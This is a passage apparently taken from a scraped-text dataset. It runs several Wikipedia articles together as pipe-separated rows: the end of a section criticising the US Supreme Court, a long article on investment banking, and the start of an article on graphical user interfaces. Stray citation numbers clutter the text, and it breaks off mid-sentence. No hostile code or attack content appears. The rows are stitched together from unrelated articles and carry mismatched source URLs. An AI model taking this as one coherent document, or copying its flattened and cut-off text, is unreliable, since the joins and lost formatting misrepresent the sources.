He cites factors like American exceptionalism, the relatively few updates to the constitution or the courts, the rightward shift of the court, and the diminished stature of the United States abroad. 243 Michael Waldman argued that no other country gives its Supreme Court as much power. 334 Warren E. Burger, before becoming Chief Justice, argued that since the Supreme Court has such "unreviewable power", it is likely to "self-indulge itself", and unlikely to "engage in dispassionate analysis." 335 Larry Sabato wrote that the federal courts, and especially the Supreme Court, have excessive power. 100 Suja A. Thomas argues the Supreme Court has taken most of the constitutionally defined power from juries in the United States for itself, 336 thanks in part to the influence of legal elites and companies that prefer judges over juries, 337 as well as the inability of the jury to defend its power. 338 Some members of Congress considered the results from the 2021–2022 term a shift of government power into the Supreme Court, and a "judicial coup". 339 The 2021–2022 term of the court was the first full term following the appointment of three judges by Republican president Donald Trump — Neil Gorsuch, Brett Kavanaugh, and Amy Coney Barrett — which created a six-strong conservative majority on the court. Subsequently, at the end of the term, the court issued a number of decisions that favored this conservative majority while significantly changing the landscape with respect to rights. These included Dobbs v. Jackson Women's Health Organization, which overturned Roe v. Wade and Planned Parenthood v. Casey in recognizing abortion is not a constitutional right; New York State Rifle & Pistol Association, Inc. v. Bruen, which made public possession of guns a protected right under the Second Amendment; Carson v. Makin and Kennedy v. Bremerton School District, which both weakened the Establishment Clause separating church and state; and West Virginia v. EPA, which weakened the power of executive branch agencies to interpret their congressional mandate. 340 341 342 There has been debate throughout American history about the boundary between federal and state power. While Framers such as James Madison 343 and Alexander Hamilton 344 argued in The Federalist Papers that their then-proposed Constitution would not infringe on the power of state governments, 345 346 347 348 others argue that expansive federal power is good and consistent with the Framers' wishes. 349 The Tenth Amendment to the United States Constitution explicitly provides that "powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people." The court has been criticized for giving the federal government too much power to interfere with state authority. One criticism is that it has allowed the federal government to misuse the Commerce Clause by upholding regulations and legislation which have little to do with interstate commerce, but that were enacted under the guise of regulating interstate commerce; and by voiding state legislation for allegedly interfering with interstate commerce. For example, the Commerce Clause was used by the Fifth Circuit Court of Appeals to uphold the Endangered Species Act, thus protecting six endemic species of insect near Austin, Texas, despite the fact that the insects had no commercial value and did not travel across state lines; the Supreme Court let that ruling stand without comment in 2005.
350 Chief Justice John Marshall asserted Congress's power over interstate commerce was "complete in itself, may be exercised to its utmost extent, and acknowledges no limitations, other than are prescribed in the Constitution. 351 Justice Alito said congressional authority under the Commerce Clause is "quite broad"; 352 modern-day theorist Robert B. Reich suggests debate over the Commerce Clause continues today. 351 Advocates of states' rights, such as constitutional scholar Kevin Gutzman, have also criticized the court, saying it has misused the Fourteenth Amendment to undermine state authority. Justice Brandeis, in arguing for allowing the states to operate without federal interference, suggested that states should be laboratories of democracy. 353 One critic wrote "the great majority of Supreme Court rulings of unconstitutionality involve state, not federal, law. 354 Others see the Fourteenth Amendment as a positive force that extends "protection of those rights and guarantees to the state level. 355 More recently, in Gamble v. United States, the Court examined the doctrine of "separate sovereigns", whereby a criminal defendant can be prosecuted in state court as well as federal court on separate charges for the same offense. 356 357 Some Court decisions have been criticized for injecting the court into the political arena, and deciding questions that are the purview of the elected branches of government. The Bush v. Gore decision, in which the Supreme Court intervened in the 2000 presidential election, awarding George W. Bush the presidency over Al Gore, received scrutiny as political based on the controversial justifications used by the five conservative justices to elevate a fellow conservative to the presidency. 358 359 360 361 362 The court has been criticized for keeping its deliberations hidden from public view. 363 364 For example, the increasing use of a 'shadow docket' facilitates the court making decisions in secret without knowing how each Justice came to their decision. 365 366 In 2024, after comparing the analysis of shadow-docket decisions to Kremlinology, Matt Ford called this trend of secrecy "increasingly troubling", arguing the court's power comes entirely from persuasion and explanation. 367 A 2007 review of Jeffrey Toobin's book compared the Court to a cartel where its inner-workings are mostly unknown, arguing this lack of transparency reduces scrutiny which hurts ordinary Americans who know little about the nine extremely consequential Justices. 358 A 2010 poll found that 61% of American voters agreed that televising Court hearings would "be good for democracy", and 50% of voters stated they would watch Court proceedings if they were televised. 368 369 Ian Millhiser of Vox speculates that the decades-long decline in cases heard could be due to the increasing political makeup of judges, that he says might be more interested in settling political disputes than legal ones. 370 British constitutional scholar Adam Tomkins sees flaws in the American system of having courts (and specifically the Supreme Court) act as checks on the Executive and Legislative branches; he argues that because the courts must wait, sometimes for years, for cases to navigate their way through the system, their ability to restrain other branches is severely weakened. 
371 372 In contrast, various other countries have a dedicated constitutional court that has original jurisdiction on constitutional claims brought by persons or political institutions; for example, the Federal Constitutional Court of Germany, which can declare a law unconstitutional when challenged. Critics have accused the Court of "slow-walking" important cases relating to former President Donald Trump in order to benefit his election chances in the face of the 2024 United States presidential election. 373 The Court is considering a Presidential immunity claim as part of the Federal prosecution of Donald Trump (election obstruction case). Critics argue that the Court has acted slowly in order to delay this case until after the election. They point out that the Court can move quickly when it wants to, as it did when it disregarded typical procedures in Bush v. Gore, granting the petition on a Saturday, receiving briefs on Sunday, holding oral arguments on Monday, and issuing the final opinion on Tuesday. 373 Author Sonja West, of Slate, argues that the Federal prosecution of Donald Trump (election obstruction case) is of similar importance to Bush v. Gore and should therefore be treated as expeditiously, but the Court seems to be taking the opposite approach. 373 Sometimes draft opinions are deliberately leaked or inadvertently released before they are published. Such releases are often purported to harm the court's reputation. 374 Chief Justice Roberts has previously described leaks as an "egregious breach of trust" that "undermine the integrity of our operations" in reference to the leaked draft opinion for Dobbs v. Jackson Women's Health Organization. 375 In addition to leaks, the Court has sometimes mistakenly released opinions before they are ready to be published. On June 26, 2024, the Court inadvertently posted an opinion for Moyle v. United States to its website that seemed to indicate that the court will temporarily allow abortions in medical emergencies in Idaho. 376 The official opinion was posted the next day, which returned the case to the lower courts without a ruling on the merits. |
216 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Investment_banking | Investment banking is an advisory-based financial service for institutional investors, corporations, governments, and similar clients. Traditionally associated with corporate finance, such a bank might assist in raising financial capital by underwriting or acting as the client's agent in the issuance of debt or equity securities. An investment bank may also assist companies involved in mergers and acquisitions (M A) and provide ancillary services such as market making, trading of derivatives and equity securities, FICC services (fixed income instruments, currencies, and commodities) or research (macroeconomic, credit or equity research). Most investment banks maintain prime brokerage and asset management departments in conjunction with their investment research businesses. As an industry, it is broken up into the Bulge Bracket (upper tier), Middle Market (mid-level businesses), and boutique market (specialized businesses). Unlike commercial banks and retail banks, investment banks do not take deposits. The revenue model of an investment bank comes mostly from the collection of fees for advising on a transaction, contrary to a commercial or retail bank. From the passage of Glass Steagall Act in 1933 until its repeal in 1999 by the Gramm Leach Bliley Act, the United States maintained a separation between investment banking and commercial banks. Other industrialized countries, including G7 countries, have historically not maintained such a separation. As part of the Dodd Frank Wall Street Reform and Consumer Protection Act of 2010 (Dodd Frank Act of 2010), the Volcker Rule asserts some institutional separation of investment banking services from commercial banking. 1 All investment banking activity is classed as either "sell side" or "buy side". The "sell side" involves trading securities for cash or for other securities (e.g. facilitating transactions, market-making), or the promotion of securities (e.g. underwriting, research, etc.). The "buy side" involves the provision of advice to institutions that buy investment services. Private equity funds, mutual funds, life insurance companies, unit trusts, and hedge funds are the most common types of buy-side entities. An investment bank can also be split into private and public functions with a screen separating the two to prevent information from crossing. The private areas of the bank deal with private insider information that may not be publicly disclosed, while the public areas, such as stock analysis, deal with public information. An advisor who provides investment banking services in the United States must be a licensed broker-dealer and subject to U.S. Securities and Exchange Commission (SEC) and Financial Industry Regulatory Authority (FINRA) regulation. 2 The Dutch East India Company was the first company to issue bonds and shares of stock to the general public. It was also the first publicly traded company, being the first company to be listed on an official stock exchange. 3 4 Investment banking has changed over the years, beginning as a partnership firm focused on underwriting security issuance, i.e. initial public offerings (IPOs) and secondary market offerings, brokerage, and mergers and acquisitions, and evolving into a "full-service" range including securities research, proprietary trading, and investment management. 
5 In the 21st century, the SEC filings of the major independent investment banks such as Goldman Sachs and Morgan Stanley reflect three product segments: In the United States, commercial banking and investment banking were separated by the Glass Steagall Act, which was repealed in 1999. The repeal led to more "universal banks" offering an even greater range of services. Many large commercial banks have therefore developed investment banking divisions through acquisitions and hiring. Notable full-service investment banks with a significant investment banking division (IBD) include JPMorgan Chase, Bank of America, Citigroup, Deutsche Bank, UBS (Acquired Credit Suisse), and Barclays. After the financial crisis of 2007 08 and the subsequent passage of the Dodd-Frank Act of 2010, regulations have limited certain investment banking operations, notably with the Volcker Rule's restrictions on proprietary trading. 7 The traditional service of underwriting security issues has declined as a percentage of revenue. As far back as 1960, 70% of Merrill Lynch's revenue was derived from transaction commissions while "traditional investment banking" services accounted for 5%. However, Merrill Lynch was a relatively "retail-focused" firm with a large brokerage network. 7 Investment banking is split into front office, middle office, and back office activities. While large service investment banks offer all lines of business, both "sell side" and "buy side", smaller sell-side advisory firms such as boutique investment banks and small broker-dealers focus on niche segments within investment banking and sales trading research, respectively. For example, Evercore (NYSE:EVR) acquired ISI International Strategy Investment (ISI) in 2014 to expand their revenue into research-driven equity sales and trading. 8 Investment banks offer services to both corporations issuing securities and investors buying securities. For corporations, investment bankers offer information on when and how to place their securities on the open market, a highly regulated process by the SEC to ensure transparency is provided to investors. Therefore, investment bankers play a very important role in issuing new security offerings. 7 9 Front office is generally described as a revenue-generating role. There are two main areas within front office: investment banking and markets. 10 Corporate finance is the aspect of investment banks which involves helping customers raise funds in capital markets and giving advice on mergers and acquisitions (M A); 12 transactions in which capital is raised for the corporation include those listed aside. 12 This work may involve, i.a., subscribing investors to a security issuance, coordinating with bidders, or negotiating with a merger target. A pitch book, also called a confidential information memorandum (CIM), is a document that highlights the relevant financial information, past transaction experience, and background of the deal team to market the bank to a potential M A client; if the pitch is successful, the bank arranges the deal for the client. 13 Recent legal and regulatory developments in the U.S. will likely alter the makeup of the group of arrangers and financiers willing to arrange and provide financing for certain highly leveraged transactions. 14 15 On behalf of the bank and its clients, a large investment bank's primary function is buying and selling products. 
16 Sales is the term for the investment bank's sales force, whose primary job is to call on institutional and high-net-worth investors to suggest trading ideas (on a caveat emptor basis) and take orders. Sales desks then communicate their clients' orders to the appropriate trading rooms, which can price and execute trades, or structure new products that fit a specific need. Sales make deals tailored to their corporate customers' needs, that is, their terms are often specific. Focusing on their customer relationship, they may deal on the whole range of asset types. (In distinction, trades negotiated by market-makers usually bear standard terms; in market making, traders will buy and sell financial products with the goal of making money on each trade. See under trading desk.) Structuring has been a relatively recent activity as derivatives have come into play, with highly technical and numerate employees working on creating complex structured products which typically offer much greater margins and returns than underlying cash securities, so-called "yield enhancement". In 2010, investment banks came under pressure as a result of selling complex derivatives contracts to local municipalities in Europe and the US. 17 Strategists advise external as well as internal clients on the strategies that can be adopted in various markets. Ranging from derivatives to specific industries, strategists place companies and industries in a quantitative framework with full consideration of the macroeconomic scene. This strategy often affects the way the firm will operate in the market, the direction it would like to take in terms of its proprietary and flow positions, the suggestions salespersons give to clients, as well as the way structurers create new products. Banks also undertake risk through proprietary trading, performed by a special set of traders who do not interface with clients and through "principal risk"—risk undertaken by a trader after he buys or sells a product to a client and does not hedge his total exposure. Here, and in general, banks seek to maximize profitability for a given amount of risk on their balance sheet. Note here that the FRTB framework has underscored the distinction between the "Trading book" and the "Banking book" - i.e. assets intended for active trading, as opposed to assets expected to be held to maturity - and market risk capital requirements will differ accordingly. The necessity for numerical ability in sales and trading has created jobs for physics, computer science, mathematics, and engineering PhDs who act as "front office" quantitative analysts. The securities research division reviews companies and writes reports about their prospects, often with "buy", "hold", or "sell" ratings. Investment banks typically have sell-side analysts which cover various industries. Their sponsored funds or proprietary trading offices will also have buy-side research. Research also covers credit risk, fixed income, macroeconomics, and quantitative analysis, all of which are used internally and externally to advise clients; alongside "Equity", these may be separate "groups". The research group(s) typically provide a key service in terms of advisory and strategy. While the research division may or may not generate revenue (based on the specific compliance policies at different banks), its resources are used to assist traders in trading, the sales force in suggesting ideas to customers, and investment bankers by covering their clients. 
18 Research also serves outside clients with investment advice (such as institutional investors and high-net-worth individuals) in the hopes that these clients will execute suggested trade ideas through the sales and trading division of the bank, and thereby generate revenue for the firm. With MiFID II requiring sell-side research teams in banks to charge for research, the business model for research is increasingly becoming revenue-generating. External rankings of researchers are becoming increasingly important, and banks have started the process of monetizing research publications, client interaction times, meetings with clients etc. There is a potential conflict of interest between the investment bank and its analysis, in that published analysis can impact the performance of a security (in the secondary markets or an initial public offering) or influence the relationship between the banker and its corporate clients, and vice versa regarding material non-public information (MNPI), thereby affecting the bank's profitability. 19 See also Chinese wall Finance. This area of the bank includes treasury management, internal controls (such as Risk), and internal corporate strategy. Corporate treasury is responsible for an investment bank's funding, capital structure management, and liquidity risk monitoring; it is (co)responsible for the bank's funds transfer pricing (FTP) framework. Internal control tracks and analyzes the capital flows of the firm, the finance division is the principal adviser to senior management on essential areas such as controlling the firm's global risk exposure and the profitability and structure of the firm's various businesses via dedicated trading desk product control teams. In the United States and United Kingdom, a comptroller (or financial controller) is a senior position, often reporting to the chief financial officer. Risk management involves analyzing the market and credit risk that an investment bank or its clients take onto their balance sheet during transactions or trades. Middle office "Credit Risk" focuses around capital markets activities, such as syndicated loans, bond issuance, restructuring, and leveraged finance. These are not considered "front office" as they tend not to be client-facing and rather 'control' banking functions from taking too much risk. "Market Risk" is the control function for the Markets' business and conducts review of sales and trading activities utilizing the VaR model. Other Middle office "Risk Groups" include country risk, operational risk, and counterparty risks which may or may not exist on a bank to bank basis. Front office risk teams, on the other hand, engage in revenue-generating activities involving debt structuring, restructuring, syndicated loans, and securitization for clients such as corporates, governments, and hedge funds. Here "Credit Risk Solutions", are a key part of capital market transactions, involving debt structuring, exit financing, loan amendment, project finance, leveraged buy-outs, and sometimes portfolio hedging. The "Market Risk Team" provides services to investors via derivative solutions, portfolio management, portfolio consulting, and risk advisory. Well-known "Risk Groups" are at JPMorgan Chase, Morgan Stanley, Goldman Sachs and Barclays. J.P. Morgan IB Risk works with investment banking to execute transactions and advise investors, although its Finance Operation risk groups focus on middle office functions involving internal, non-revenue generating, operational risk controls. 
20 21 22 The credit default swap, for instance, is a famous credit risk hedging solution for clients invented by J.P. Morgan's Blythe Masters during the 1990s. The Loan Risk Solutions group 23 within Barclays' investment banking division and Risk Management and Financing group 24 housed in Goldman Sach's securities division are client-driven franchises. Risk management groups such as credit risk, operational risk, internal risk control, and legal risk are restrained to internal business functions — including firm balance-sheet risk analysis and assigning the trading cap — that are independent of client needs, even though these groups may be responsible for deal approval that directly affects capital market activities. Similarly, the Internal corporate strategy group, tackling firm management and profit strategy, unlike corporate strategy groups that advise clients, is non-revenue regenerating yet a key functional role within investment banks. This list is not a comprehensive summary of all middle-office functions within an investment bank, as specific desks within front and back offices may participate in internal functions. 25 The back office data-checks trades that have been conducted, ensuring that they are not wrong, and transacts the required transfers. Many banks have outsourced operations. It is, however, a critical part of the bank. citation needed Every major investment bank has considerable amounts of in-house software, created by the technology team, who are also responsible for technical support. Technology has changed considerably in the last few years as more sales and trading desks are using electronic processing. Some trades are initiated by complex algorithms for hedging purposes. Firms are responsible for compliance with local and foreign government regulations and internal regulations. The investment banking industry can be broken up into Bulge Bracket (upper tier), Middle Market (mid-level businesses), and boutique market (specialized businesses) categories. There are various trade associations throughout the world which represent the industry in lobbying, facilitate industry standards, and publish statistics. The International Council of Securities Associations (ICSA) is a global group of trade associations. In the United States, the Securities Industry and Financial Markets Association (SIFMA) is likely the most significant; however, several of the large investment banks are members of the American Bankers Association Securities Association (ABASA), 27 while small investment banks are members of the National Investment Banking Association (NIBA). In Europe, the European Forum of Securities Associations was formed in 2007 by various European trade associations. 28 Several European trade associations (principally the London Investment Banking Association and the European SIFMA affiliate) combined in November 2009 to form the Association for Financial Markets in Europe (AFME). 29 In the securities industry in China, the Securities Association of China is a self-regulatory organization whose members are largely investment banks. Global investment banking revenue increased for the fifth year running in 2007, to a record US$84 billion, which was up 22% on the previous year and more than double the level in 2003. 30 Subsequent to their exposure to United States sub-prime securities investments, many investment banks have experienced losses. 
As of late 2012, global revenues for investment banks were estimated at $240 billion, down about a third from 2009, as companies pursued less deals and traded less. 31 Differences in total revenue are likely due to different ways of classifying investment banking revenue, such as subtracting proprietary trading revenue. In terms of total revenue, SEC filings of the major independent investment banks in the United States show that investment banking (defined as M A advisory services and security underwriting) made up only about 15 20% of total revenue for these banks from 1996 to 2006, with the majority of revenue (60 in some years) brought in by "trading" which includes brokerage commissions and proprietary trading; the proprietary trading is estimated to provide a significant portion of this revenue. 6 The United States generated 46% of global revenue in 2009, down from 56% in 1999. Europe (with Middle East and Africa) generated about a third, while Asian countries generated the remaining 21%. 30 : 8 The industry is heavily concentrated in a small number of major financial centers, including New York City, City of London, Frankfurt, Hong Kong, Singapore, and Tokyo. The majority of the world's largest Bulge Bracket investment banks and their investment managers are headquartered in New York and are also important participants in other financial centers. 32 The city of London has historically served as a hub of European M A activity, often facilitating the most capital movement and corporate restructuring in the area. 33 34 Meanwhile, Asian cities are receiving a growing share of M A activity. According to estimates published by the International Financial Services London, for the decade prior to the financial crisis in 2008, M A was a primary source of investment banking revenue, often accounting for 40% of such revenue, but dropped during and after the financial crisis. 30 : 9 Equity underwriting revenue ranged from 30% to 38%, and fixed-income underwriting accounted for the remaining revenue. 30 : 9 Revenues have been affected by the introduction of new products with higher margins; however, these innovations are often copied quickly by competing banks, pushing down trading margins. For example, brokerages commissions for bond and equity trading is a commodity business, but structuring and trading derivatives have higher margins because each over-the-counter contract has to be uniquely structured and could involve complex pay-off and risk profiles. One growth area is private investment in public equity (PIPEs, otherwise known as Regulation D or Regulation S). Such transactions are privately negotiated between companies and accredited investors. Banks also earned revenue by securitizing debt, particularly mortgage debt prior to the financial crisis. Investment banks have become concerned that lenders are securitizing in-house, driving the investment banks to pursue vertical integration by becoming lenders, which has been allowed in the United States since the repeal of the Glass Steagall Act in 1999. 35 According to The Wall Street Journal, in terms of total M A advisory fees for the whole of 2020, the top ten investment banks were as listed in the table below. 36 Many of these firms belong either to the Bulge Bracket (upper tier), Middle Market (mid-level businesses), or are elite boutique investment banks (independent advisory investment banks). 
The above list is just a ranking of the advisory arm (M A advisory, syndicated loans, equity capital markets, and debt capital markets) of each bank and does not include the generally much larger portion of revenues from sales trading and asset management. Mergers and acquisitions and capital markets are also often covered by The Wall Street Journal and Bloomberg. The financial crisis of 2007 2008 led to the collapse of several notable investment banks, such as the bankruptcy of Lehman Brothers (one of the largest investment banks in the world) and the hurried fire sale of Merrill Lynch and the much smaller Bear Stearns to much larger banks, which effectively rescued them from bankruptcy. The entire financial services industry, including numerous investment banks, was bailed out by government taxpayer funded loans through the Troubled Asset Relief Program (TARP). Surviving U.S. investment banks such as Goldman Sachs and Morgan Stanley converted to traditional bank holding companies to accept TARP relief. 38 Similar situations have occurred across the globe with countries rescuing their banking industry. Initially, banks received part of a $700 billion TARP intended to stabilize the economy and thaw the frozen credit markets. 39 Eventually, taxpayer assistance to banks reached nearly $13 trillion—most without much scrutiny— 40 lending did not increase, 41 and credit markets remained frozen. 42 The crisis led to questioning of the investment banking business model 43 without the regulation imposed on it by Glass Steagall. neutrality is disputed Once Robert Rubin, a former co-chairman of Goldman Sachs, became part of the Clinton administration and deregulated banks, the previous conservatism of underwriting established companies and seeking long-term gains was replaced by lower standards and short-term profit. 44 Formerly, the guidelines said that in order to take a company public, it had to be in business for a minimum of five years and it had to show profitability for three consecutive years. After deregulation, those standards were gone, but small investors did not grasp the full impact of the change. 44 A number of former Goldman Sachs top executives, such as Henry Paulson and Ed Liddy, were in high-level positions in government and oversaw the controversial taxpayer-funded bank bailout. 44 The TARP Oversight Report released by the Congressional Oversight Panel found that the bailout tended to encourage risky behavior and "corrupt ed the fundamental tenets of a market economy". 45 Under threat of a subpoena, Goldman Sachs revealed that it received $12.9 billion in taxpayer aid, $4.3 billion of which was then paid out to 32 entities, including many overseas banks, hedge funds, and pensions. 46 The same year it received $10 billion in aid from the government, it also paid out multimillion-dollar bonuses; the total paid in bonuses was $4.82 billion. 47 48 Similarly, Morgan Stanley received $10 billion in TARP funds and paid out $4.475 billion in bonuses. 49 The investment banking industry, including boutique investment banks, have come under criticism for a variety of reasons, including perceived conflicts of interest, overly large pay packages, cartel-like or oligopolistic behavior, taking both sides in transactions, and more. 50 Investment banking has also been criticized for its opacity. 51 However, the lack of transparency inherent to the investment banking industry is largely due to the necessity to abide by the non-disclosure agreement (NDA) signed with the client. 
The accidental leak of confidential client data can cause a bank to incur significant monetary losses. Conflicts of interest may arise between different parts of a bank, creating the potential for market manipulation, according to critics. Authorities that regulate investment banking, such as the Financial Conduct Authority (FCA) in the United Kingdom and the SEC in the United States, require that banks impose a "Chinese wall" to prevent communication between investment banking on one side and equity research and trading on the other. However, critics say such a barrier does not always exist in practice. Independent advisory firms that exclusively provide corporate finance advice argue that their advice is not conflicted, unlike bulge bracket banks. Conflicts of interest often arise in relation to investment banks' equity research units, which have long been part of the industry. A common practice is for equity analysts to initiate coverage of a company to develop relationships that lead to highly profitable investment banking business. In the 1990s, many equity researchers allegedly traded positive stock ratings for investment banking business. Alternatively, companies may threaten to divert investment banking business to competitors unless their stock was rated favorably. Laws were passed to criminalize such acts, and increased pressure from regulators and a series of lawsuits, settlements, and prosecutions curbed this business to a large extent following the 2001 stock market tumble after the dot-com bubble. Philip Augar, author of The Greed Merchants, said in an interview that, "You cannot simultaneously serve the interest of issuer clients and investing clients. And it’s not just underwriting and sales; investment banks run proprietary trading operations that are also making a profit out of these securities. 50 Many investment banks also own retail brokerages. During the 1990s, some retail brokerages sold consumers securities which did not meet their stated risk profile. This behavior may have led to investment banking business or even sales of surplus shares during a public offering to keep public perception of the stock favorable. Since investment banks engage heavily in trading for their own account, there is always the temptation for them to engage in some form of front running—the illegal practice whereby a broker executes orders for their own account before filling orders previously submitted by their customers, thereby benefiting from any changes in prices induced by those orders. Documents under seal in a decade-long lawsuit concerning eToys.com's IPO but obtained by New York Times' Wall Street Business columnist Joe Nocera alleged that IPOs managed by Goldman Sachs and other investment bankers involved asking for kickbacks from their institutional clients who made large profits flipping IPOs which Goldman had intentionally undervalued. Depositions in the lawsuit alleged that clients willingly complied with these demands because they understood it was necessary to participate in future hot issues. 52 Reuters Wall Street correspondent Felix Salmon retracted his earlier, more conciliatory statements on the subject and said he believed that the depositions show that companies going public and their initial consumer stockholders are both defrauded by this practice, which may be widespread throughout the IPO finance industry. 53 The case is ongoing, and the allegations remain unproven. 
Nevertheless, the controversy around investment banks intentionally underpricing IPOs for their self-interest has become a highly debated subject. The cause for concern is that the investment banks advising on the IPOs have the incentive to serve institutional investors on the buy-side, creating a valid reason for a potential conflict of interest. 54 The post-IPO spike in the stock price of newly listed companies has only worsened the problem, with one of the leading critics being high-profile venture capital (VC) investor, Bill Gurley. 55 Investment banking has been criticized for the enormous pay packages awarded to those who work in the industry. According to Bloomberg Wall Street's five biggest firms paid over $3 billion to their executives from 2003 to 2008, "while they presided over the packaging and sale of loans that helped bring down the investment-banking system". 56 In 2003 2007, pay packages included $172 million for Merrill Lynch CEO Stanley O'Neal before the bank was bought by Bank of America, and $161 million for Bear Stearns' James Cayne before the bank collapsed and was sold to JPMorgan Chase. 56 Such pay arrangements attracted the ire of Democrats and Republicans in the United States Congress, who demanded limits on executive pay in 2008 when the U.S. government was bailing out the industry with a $700 billion financial rescue package. 56 Writing in the Global Association of Risk Professionals journal, Aaron Brown, a vice president at Morgan Stanley, says "By any standard of human fairness, of course, investment bankers make obscene amounts of money. 50 |
217 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/GUI | A graphical user interface, or GUI ( u i 1 2 GOO-ee), is a form of user interface that allows users to interact with electronic devices through graphical icons and visual indicators such as secondary notation. In many applications, GUIs are used instead of text-based UIs, which are based on typed command labels or text navigation. GUIs were introduced in reaction to the perceived steep learning curve of command-line interfaces (CLIs), 3 4 5 which require commands to be typed on a computer keyboard. The actions in a GUI are usually performed through direct manipulation of the graphical elements. 6 7 8 Beyond computers, GUIs are used in many handheld mobile devices such as MP3 players, portable media players, gaming devices, smartphones and smaller household, office and industrial controls. The term GUI tends not to be applied to other lower-display resolution types of interfaces, such as video games (where head-up displays (HUDs) 9 are preferred), or not including flat screens like volumetric displays 10 because the term is restricted to the scope of 2D display screens able to describe generic information, in the tradition of the computer science research at the Xerox Palo Alto Research Center. Designing the visual composition and temporal behavior of a GUI is an important part of software application programming in the area of human computer interaction. Its goal is to enhance the efficiency and ease of use for the underlying logical design of a stored program, a design discipline named usability. Methods of user-centered design are used to ensure that the visual language introduced in the design is well-tailored to the tasks. The visible graphical interface features of an application are sometimes referred to as chrome or GUI. 11 12 13 Typically, users interact with information by manipulating visual widgets that allow for interactions appropriate to the kind of data they hold. The widgets of a well-designed interface are selected to support the actions necessary to achieve the goals of users. A model view controller allows flexible structures in which the interface is independent of and indirectly linked to application functions, so the GUI can be customized easily. This allows users to select or design a different skin or theme at will, and eases the designer's work to change the interface as user needs evolve. Good GUI design relates to users more, and to system architecture less. Large widgets, such as windows, usually provide a frame or container for the main presentation content such as a web page, email message, or drawing. Smaller ones usually act as a user-input tool. A GUI may be designed for the requirements of a vertical market as application-specific GUIs. Examples include automated teller machines (ATM), point of sale (POS) touchscreens at restaurants, 14 self-service checkouts used in a retail store, airline self-ticket and check-in, information kiosks in a public space, like a train station or a museum, and monitors or control screens in an embedded industrial application which employ a real-time operating system (RTOS). Cell phones and handheld game systems also employ application specific touchscreen GUIs. Newer automobiles use GUIs in their navigation systems and multimedia centers, or navigation multimedia center combinations. A GUI uses a combination of technologies and devices to provide a platform that users can interact with, for the tasks of gathering and producing information. 
A series of elements conforming a visual language have evolved to represent information stored in computers. This makes it easier for people with few computer skills to work with and use computer software. The most common combination of such elements in GUIs is the windows, icons, text fields, canvases, menus, pointer (WIMP) paradigm, especially in personal computers. 15 The WIMP style of interaction uses a virtual input device to represent the position of a pointing device's interface, most often a mouse, and presents information organized in windows and represented with icons. Available commands are compiled together in menus, and actions are performed making gestures with the pointing device. A window manager facilitates the interactions between windows, applications, and the windowing system. The windowing system handles hardware devices such as pointing devices, graphics hardware, and positioning of the pointer. In personal computers, all these elements are modeled through a desktop metaphor to produce a simulation called a desktop environment in which the display represents a desktop, on which documents and folders of documents can be placed. Window managers and other software combine to simulate the desktop environment with varying degrees of realism. Entries may appear in a list to make space for text and details, or in a grid for compactness and larger icons with little space underneath for text. Variations inbetween exist, such as a list with multiple columns of items and a grid of items with rows of text extending sideways from the icon. 16 Multi-row and multi-column layouts commonly found on the web are "shelf" and "waterfall". The former is found on image search engines, where images appear with a fixed height but variable length, and is typically implemented with the CSS property and parameter display: inline-block;. A waterfall layout found on Imgur and TweetDeck with fixed width but variable height per item is usually implemented by specifying column-width:. Smaller app mobile devices such as personal digital assistants (PDAs) and smartphones typically use the WIMP elements with different unifying metaphors, due to constraints in space and available input devices. Applications for which WIMP is not well suited may use newer interaction techniques, collectively termed post-WIMP UIs. 17 As of 2011, some touchscreen-based operating systems such as Apple's iOS (iPhone) and Android use the class of GUIs named post-WIMP. These support styles of interaction using more than one finger in contact with a display, which allows actions such as pinching and rotating, which are unsupported by one pointer and mouse. 18 Human interface devices, for the efficient interaction with a GUI include a computer keyboard, especially used together with keyboard shortcuts, pointing devices for the cursor (or rather pointer) control: mouse, pointing stick, touchpad, trackball, joystick, virtual keyboards, and head-up displays (translucent information devices at the eye level). There are also actions performed by programs that affect the GUI. For example, there are components like inotify or D-Bus to facilitate communication between computer programs. Ivan Sutherland developed Sketchpad in 1963, widely held as the first graphical computer-aided design program. It used a light pen to create and manipulate objects in engineering drawings in realtime with coordinated graphics. 
In the late 1960s, researchers at the Stanford Research Institute, led by Douglas Engelbart, developed the On-Line System (NLS), which used text-based hyperlinks manipulated with a then-new device: the mouse. (A 1968 demonstration of NLS became known as "The Mother of All Demos".) In the 1970s, Engelbart's ideas were further refined and extended to graphics by researchers at Xerox PARC and specifically Alan Kay, who went beyond text-based hyperlinks and used a GUI as the main interface for the Smalltalk programming language, which ran on the Xerox Alto computer, released in 1973. Most modern general-purpose GUIs are derived from this system. The Xerox PARC GUI consisted of graphical elements such as windows, menus, radio buttons, and check boxes. The concept of icons was later introduced by David Canfield Smith, who had written a thesis on the subject under the guidance of Kay. 19 20 21 The PARC GUI employs a pointing device along with a keyboard. These aspects can be emphasized by using the alternative term and acronym for windows, icons, menus, pointing device (WIMP). This effort culminated in the 1973 Xerox Alto, the first computer with a GUI, though the system never reached commercial production. The first commercially available computer with a GUI was the 1979 PERQ workstation, manufactured by Three Rivers Computer Corporation. Its design was heavily influenced by the work at Xerox PARC. In 1981, Xerox eventually commercialized the ideas from the Alto in the form of a new and enhanced system the Xerox 8010 Information System more commonly known as the Xerox Star. 22 23 These early systems spurred many other GUI efforts, including Lisp machines by Symbolics and other manufacturers, the Apple Lisa (which presented the concept of menu bar and window controls) in 1983, the Apple Macintosh 128K in 1984, and the Atari ST with Digital Research's GEM, and Commodore Amiga in 1985. Visi On was released in 1983 for the IBM PC compatible computers, but was never popular due to its high hardware demands. 24 Nevertheless, it was a crucial influence on the contemporary development of Microsoft Windows. 25 Apple, Digital Research, IBM and Microsoft used many of Xerox's ideas to develop products, and IBM's Common User Access specifications formed the basis of the GUIs used in Microsoft Windows, IBM OS 2 Presentation Manager, and the Unix Motif toolkit and window manager. These ideas evolved to create the interface found in current versions of Microsoft Windows, and in various desktop environments for Unix-like operating systems, such as macOS and Linux. Thus most current GUIs have largely common idioms. GUIs were a hot topic in the early 1980s. The Apple Lisa was released in 1983, and various windowing systems existed for DOS operating systems (including PC GEM and PC GEOS). Individual applications for many platforms presented their own GUI variants. 26 Despite the GUIs advantages, many reviewers questioned the value of the entire concept, 27 citing hardware limits, and problems in finding compatible software. In 1984, Apple released a television commercial which introduced the Apple Macintosh during the telecast of Super Bowl XVIII by CBS, 28 with allusions to George Orwell's noted novel Nineteen Eighty-Four. The goal of the 